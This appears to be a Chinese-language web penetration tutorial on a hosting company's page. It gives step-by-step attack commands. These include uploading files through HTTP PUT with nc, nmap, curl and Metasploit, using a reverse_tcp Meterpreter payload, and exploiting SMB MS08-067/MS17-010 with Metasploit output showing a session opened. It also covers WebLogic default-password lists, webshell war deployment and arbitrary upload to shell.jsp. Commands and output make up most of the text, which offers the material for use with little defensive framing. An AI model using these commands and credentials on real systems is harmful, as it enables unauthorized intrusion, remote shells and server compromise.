您好,登錄后才能下訂單哦!
這期內容當中小編將會給大家帶來有關Web漏洞利用姿勢的示例分析,文章內容豐富且以專業的角度為大家分析和敘述,閱讀完這篇文章希望大家可以有所收獲。
1、HTTP PUT方法利用
PUT是用來進行文件管理的方法,若運維人員未修改Web服務器缺省配置,依然支持這些方法,則可以向服務器文件系統任意上傳文件。
1.1、 Netcat利用PUT方法
Netcat是一款非常出名的網絡工具,簡稱“NC”,有滲透測試中的“瑞士**”之稱。它可以用作端口監聽、端口掃描、遠程文件傳輸、還可以實現遠程shell等功能。
查看得知Web服務開啟PUT方法后,輸入如下命令上傳文件:
nc IP PORT
PUT /dav/hack.txt HTTP/1.1
Host: IP
按兩次回車可以看到hacked.txt文件已經成功創建,狀態碼是201,文件創建位置為/dav/目錄。
1.2、Nmap利用PUT方法
命令:
nmap -p 端口 IP -script http-put-script-args http-put.url='/dav/test.php',http-put.file='/root/test.php'
命令講解:
-script http-put //選擇http-put腳本,腳本支持使用http put方法上傳文件。
-script-args //設置腳本參數1、2
http-put.url='/dav/test.php' //設置參數1為上傳目標文件路徑
http-put.file='/root/test.php' //設置參數2為上傳本地文件路徑。
圖中可以看到通過Nmap腳本上傳成功。
使用日常見面的BurpSuite訪問上傳目標路徑抓取數據包,修改數據包請求方式及上傳路徑,在請求正文中寫入文件內容,發包至Web服務器。
服務器響應包顯示文件創建成功。
CURL是一個利用URL語法在命令行下工作的文件傳輸工具,通過指定的URL來上傳或下載數據,并將數據展示出來。curl中的c表示client,而URL,就是URL。
通過PUT方法創建文件命令如下:
命令1:
curl -i -XPUT -H “Content-Type: text/plain; charset=utf-8” -d “hack completed” http://192.168.40.4/dav/hack.php
命令講解:
-i/--include //輸出時包括protocol頭信息
-X/--request <command> //指定PUT命令
-H/--header <line> //自定義頭信息“Content-Type:text/plain; charset=utf-8”傳遞給服務器
-d/--data <data> //HTTP POST方式將文本寫入創建的http://192.168.40.4/dav/hack.php
命令2:
curl -i -X PUT -H “Content-Type:application/xml; charset=utf-8″ -d @”F:\1.php” http://192.168.40.4/dav/hack.php
命令講解:
-d @“filename” //從文件讀入內容
1.5 QuickPuT腳本利用PUT方法
QuickPut是Python命令行工具,可以利用該腳本通過HTTP PUT方法來上傳文件到服務器。
上傳命令:
python2 QuickPut.py F:\1.php http://192.168.40.4/dav/hack1.php
命令講解:
python QuickPut.py <本地文件> <目標URL>
Metasploit的輔助模塊auxiliary/scanner/http/http_put可實現文件上傳,刪除操作。
命令:
use auxiliary/scanner/http/http_put //使用http_put模塊
show options //顯示模塊參數
set RHOSTS 192.168.40.4 //設置目標IP
set PATH /dav/ //設置目標路徑
set payload php/meterpreter/reverse_tcp //設置攻擊載荷
set filename msf.php //設置上傳文件名
set FILEDATA file://root/test.php //設置上傳本地文件數據路徑
exploit //開始攻擊
返回結果顯示成功上傳文件。
進行信息收集端口掃描后發現主機開啟139,445端口且banner顯示為Microsoft Windows,則會聯想到與139、445端口SMB漏洞,比較常見的有ms17-010,ms08-067等。
漏洞檢測
命令:
namp --script=/usr/share/nmap/scripts/smb-vuln-ms08-067.nse –sTIP
namp --script=/usr/share/nmap/scripts/smb-vuln-ms17-010.nse –sTIP
命令講解:
--script=/usr/share/nmap/scripts/smb-vuln-ms08-067.nse //使用Nmapms08-067漏洞掃描腳本
-sT //使用TCP掃描
若輸出結果為:
smb-vuln-ms08-067:
VULNERABLE:
Microsoft Windows system vulnerable toremote code execution (MS08-067)
State: VULNERABLE
IDs: CVE:CVE-2008-4250
The Server service inMicrosoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,Vista Goldand SP1, Server 2008, and 7 Pre-Beta allows remote attackers to executearbitrarycode via a crafted RPC request that triggers the overflow during pathcanonicalization.
Disclosure date: 2008-10-23
References:
https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
則說明存在ms08-067漏洞,ms17-010同上。
漏洞利用
使用MSF smb攻擊模塊,利用ms08-067與ms17-010漏洞。
msf> use exploit/windows/smb/ms08_067_netapi
msfexploit(ms08_067_netapi) > set RHOST IP
msfexploit(ms08_067_netapi) > exploit
[*]Started reverse TCP handler on 本地監聽IP端口
[*]目標IP:445- Automatically detecting the target...
[*]目標IP:445- Fingerprint: Windows 2000 - Service Pack 0 - 4 - lang:English
[*]目標IP:445- Selected Target: Windows 2000 Universal
[*]目標IP:445- Attempting to trigger the vulnerability...
[*]Sending stage (957487 bytes) to 目標IP
[*]Meterpreter session 2 opened (監聽IP端口 -> 目標端口反彈)
meterpreter>
ms17-010漏洞利用同上。
在滲透測試中常常會遇到Weblogic Server應用服務器,看到Weblogic Server后聯想到Weblogic Server可能會存在后臺管理弱口令、JAVA反序列化漏洞、任意文件上傳漏洞等許多本版的各種CVE漏洞。下面分享下Weblogic各種漏洞的利用手法。
3.1 后臺登錄弱口令
常見Weblogic Server登錄弱口令:
weblogic/weblogic
weblogic/weblogic1
weblogic/weblogic10
weblogic/weblogic123
若存在即可登錄應用服務器管理后臺,上傳webshellwar包。
上傳后在應用服務器中部署war包
上傳部署war包成功后即可訪問大馬。
3.2 JAVA反序列化漏洞
CVE漏洞可直接使用腳本檢測,然后根據漏洞代碼尋找exp腳本漏洞利用。
Weblogic漏洞檢測腳本十分強大,可檢測各種CVE、管理后臺路徑、SSRF、弱口令、并支持后期擴展。
也可利用Java反序列化漏洞利用工具直接進行檢測利用。漏洞工具提供漏洞檢測、命令執行、文件上傳、批量檢查功能。
3.3 Weblogic 任意文件上傳漏洞
通過爆破Weblogic返回信息。
獲取到登錄口令、服務名、隨機字符目錄,構造上傳POC進行測試文件上傳。
在/bea_wls_deployment_internal/DeploymentService路徑下傳入以下數據
服務器返回上傳成功和文件絕對路徑。
訪問此上傳文件路徑后顯示上傳文件內容
http://IP/bea_wls_deployment_internal/shell.jsp
上述就是小編為大家分享的Web漏洞利用姿勢的示例分析了,如果剛好有類似的疑惑,不妨參照上述分析進行理解。如果想知道更多相關知識,歡迎關注億速云行業資訊頻道。
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。